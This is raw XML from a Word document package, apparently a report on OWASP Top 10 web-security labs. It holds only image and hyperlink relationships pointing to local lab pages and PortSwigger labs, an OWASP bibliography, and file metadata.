Target="http://localhost:8000/cryptographic_failure/lab2" TargetMode="External"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image47.png"/><Relationship Id="rId89" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:8000/2021/A8/lab2" TargetMode="External"/><Relationship Id="rId112" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image84.png"/><Relationship Id="rId133" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image100.png"/><Relationship Id="rId154" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image117.png"/><Relationship Id="rId175" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image135.png"/><Relationship Id="rId196" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image153.png"/><Relationship Id="rId200" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image157.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId221" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image176.png"/><Relationship Id="rId242" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image196.png"/><Relationship Id="rId263" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image215.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.png"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image39.png"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image56.png"/><Relationship Id="rId102" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image76.png"/><Relationship Id="rId123" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image93.png"/><Relationship Id="rId144" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image109.png"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image64.png"/><Relationship Id="rId165" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image127.png"/><Relationship Id="rId186" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/prototype-pollution/client-side/browser-apis/lab-prototype-pollution-client-side-prototype-pollution-via-browser-apis" TargetMode="External"/><Relationship Id="rId211" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image167.png"/><Relationship Id="rId232" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image187.png"/><Relationship Id="rId253" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image206.png"/><Relationship Id="rId274" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/server-side-template-injection/exploiting/lab-server-side-template-injection-basic" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image32.png"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image48.png"/><Relationship Id="rId113" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image85.png"/><Relationship Id="rId134" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image101.png"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image57.png"/><Relationship Id="rId155" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image118.png"/><Relationship Id="rId176" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image136.png"/><Relationship Id="rId197" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image154.png"/><Relationship Id="rId201" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image158.png"/><Relationship Id="rId222" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image177.png"/><Relationship Id="rId243" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image197.png"/><Relationship Id="rId264" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/deserialization/exploiting/lab-deserialization-modifying-serialized-objects" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.png"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image40.png"/><Relationship Id="rId103" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:8000/a10_lab" TargetMode="External"/><Relationship Id="rId124" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image94.png"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image49.png"/><Relationship Id="rId91" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image65.png"/><Relationship Id="rId145" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image110.png"/><Relationship Id="rId166" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image128.png"/><Relationship Id="rId187" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image145.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../customXml/item1.xml"/><Relationship Id="rId212" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image168.png"/><Relationship Id="rId233" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image188.png"/><Relationship Id="rId254" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image207.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:8000/broken_access_lab_2" TargetMode="External"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.md5online.org/md5-decrypt.html" TargetMode="External"/><Relationship Id="rId114" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image86.png"/><Relationship Id="rId275" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image225.png"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:8000/injection_sql_lab" TargetMode="External"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image58.png"/><Relationship Id="rId135" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image102.png"/><Relationship Id="rId156" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image119.png"/><Relationship Id="rId177" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image137.png"/><Relationship Id="rId198" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image155.png"/><Relationship Id="rId202" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image159.png"/><Relationship Id="rId223" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image178.png"/><Relationship Id="rId244" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image198.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.png"/><Relationship Id="rId265" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image216.png"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.png"/><Relationship Id="rId104" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image77.png"/><Relationship Id="rId125" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:8000/ssrf_target" TargetMode="External"/><Relationship Id="rId146" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image111.png"/><Relationship Id="rId167" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image129.png"/><Relationship Id="rId188" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image146.png"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:8000/sec_mis_lab" TargetMode="External"/><Relationship Id="rId92" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image66.png"/><Relationship Id="rId213" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image169.png"/><Relationship Id="rId234" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image189.pn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image" Target="media/image208.png"/><Relationship Id="rId276" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image226.png"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.png"/><Relationship Id="rId115" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image87.png"/><Relationship Id="rId136" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image103.png"/><Relationship Id="rId157" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image120.png"/><Relationship Id="rId178" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/information-disclosure/exploiting/lab-infoleak-via-backup-files" TargetMode="External"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image41.png"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:8000/auth_failure/lab2/admin12983gfugef81e8yeryepanel" TargetMode="External"/><Relationship Id="rId199" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image156.png"/><Relationship Id="rId203" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image160.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId224" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image179.png"/><Relationship Id="rId245" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image199.png"/><Relationship Id="rId266" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image217.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId105" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image78.png"/><Relationship Id="rId126" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image95.png"/><Relationship Id="rId147" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image112.png"/><Relationship Id="rId168" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/file-path-traversal/lab-absolute-path-bypass" TargetMode="External"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image34.png"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image50.png"/><Relationship Id="rId93" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image67.png"/><Relationship Id="rId189" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image147.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId214" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image170.png"/><Relationship Id="rId235" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/authentication/multi-factor/lab-2fa-simple-bypass" TargetMode="External"/><Relationship Id="rId256" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://0a440051049fe814828ac0b3004b0062.web-security-academy.net/feedback" TargetMode="External"/><Relationship Id="rId277" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image227.png"/><Relationship Id="rId116" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image88.png"/><Relationship Id="rId137" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image104.png"/><Relationship Id="rId158" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image121.png"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:8000/cryptographic_failure/lab" TargetMode="External"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image42.png"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image59.png"/><Relationship Id="rId179" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image138.png"/><Relationship Id="rId190" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image148.png"/><Relationship Id="rId204" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image161.png"/><Relationship Id="rId225" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image180.png"/><Relationship Id="rId246" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/clickjacking/lab-exploiting-to-trigger-dom-based-xss" TargetMode="External"/><Relationship Id="rId267" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image218.png"/><Relationship Id="rId106" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image79.png"/><Relationship Id="rId127" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:8000/cmd_lab" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://10015.io/tools/sha256-encrypt-decrypt" TargetMode="External"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image51.png"/><Relationship Id="rId94" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image68.png"/><Relationship Id="rId148" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://sca.analysiscenter.veracode.com/vulnerability-database/security/arbitrary-code-execution/python/sid-22250" TargetMode="External"/><Relationship Id="rId169" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image130.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId180" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image139.png"/><Relationship Id="rId215" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image171.png"/><Relationship Id="rId236" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image190.png"/><Relationship Id="rId257" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image209.png"/><Relationship Id="rId278" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image228.png"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.png"/><Relationship Id="rId84" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:admin_pygoat@pygoat.com" TargetMode="External"/><Relationship Id="rId138" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image105.png"/><Relationship Id="rId191" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image149.png"/><Relationship Id="rId205" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image162.png"/><Relationship Id="rId247" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image200.png"/><Relationship Id="rId107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image80.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://drive.google.com/drive/folders/1zo3QEceGxlcZVc3ZDw2sviRMis5MltHC?usp=drive_link" TargetMode="External"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image35.png"/><Relationship Id="rId149" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image113.png"/><Relationship Id="rId95" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image69.png"/><Relationship Id="rId160" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image123.png"/><Relationship Id="rId216" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image172.png"/><Relationship Id="rId258" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2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wa</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{F8FB2DA4-69B9-4CA7-A8F3-B358149E2E28}</b:Guid>
    <b:Title>owasp.org</b:Title>
    <b:URL>https://owasp.org/www-project-top-ten/</b:URL>
    <b:RefOrder>1</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>owa1</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{8386E67D-3F62-47FB-BAAF-D0EB11719254}</b:Guid>
    <b:Title>owasp.org</b:Title>
    <b:URL>https://owasp.org/Top10/</b:URL>
    <b:RefOrder>2</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>suc</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{C1E66329-B542-461E-B141-ABC97844F05F}</b:Guid>
    <b:Title>sucuri.net</b:Title>
    <b:URL>https://sucuri.net/guides/owasp_top_10_2021_edition/</b:URL>
    <b:RefOrder>3</b:RefOrder>
  </b:Source>
</b:Sources>
</file>

<file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{73D3969C-9FCB-4A91-A28D-29155A994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8</Pages>
  <Words>15086</Words>
  <Characters>85994</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ình Trần Văn</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Bình Trần Văn</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-11-19T05:00:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-11-19T05:00:00Z</dcterms:modified>
</cp:coreProperties>
</file>